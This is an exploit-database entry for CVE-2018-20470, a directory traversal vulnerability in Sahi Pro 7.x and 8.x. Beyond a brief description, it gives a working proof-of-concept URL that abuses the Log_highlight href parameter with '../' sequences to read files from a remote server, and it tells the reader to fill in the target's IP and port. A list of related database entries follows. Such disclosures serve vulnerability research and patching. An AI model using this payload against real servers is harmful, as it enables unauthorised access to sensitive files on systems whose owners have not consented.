Lucene search
Goutham Madhwaraj1337DAY-ID-32880HistoryJun 18, 2019 - 12:00 a.m.
Sahi pro 7.x/8.x - Directory Traversal Vulnerability
2019-06-1800:00:00
Goutham Madhwaraj
0day.today
196
EPSS
0.111
Percentile
95.2%
Exploit for multiple platform in category web applications
# Exploit Title: Sahi pro ( <= 8.x ) Directory traversal
# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
# Vendor Homepage: https://sahipro.com/
# Software Link: https://sahipro.com/downloads-archive/
# Version: 7.x , <= 8.x
# Tested on: Windows 10
# CVE : CVE-2018-20470
Description :
An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
POC :
vulnerable URL :
''' replace the ip and port of the remote sahi pro server machine '''
http://<ip>:<port>/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected
# 0day.today [2019-06-18] #Related
exploitpack
exploitpack
Sahi pro 7.x8.x - Directory Traversal
2019-06-18 00:00:00
nuclei
nuclei
Tyto Sahi pro 7.x/8.x - Local File Inclusion
2021-08-02 23:19:42
packetstorm
packetstorm
Sahi Pro 7.x / 8.x Directory Traversal
2019-06-18 00:00:00
cvelist
cvelist
CVE-2018-20470
2019-06-17 13:26:53
prion
prion
Directory traversal
2019-06-17 14:15:00
nvd
nvd
CVE-2018-20470
2019-06-17 14:15:10
cve
cve
CVE-2018-20470
2019-06-17 14:15:10
dsquare
dsquare
Sahi Pro 8.x File Disclosure
2019-07-03 00:00:00
exploitdb
exploitdb
Sahi pro 7.x/8.x - Directory Traversal
2019-06-18 00:00:00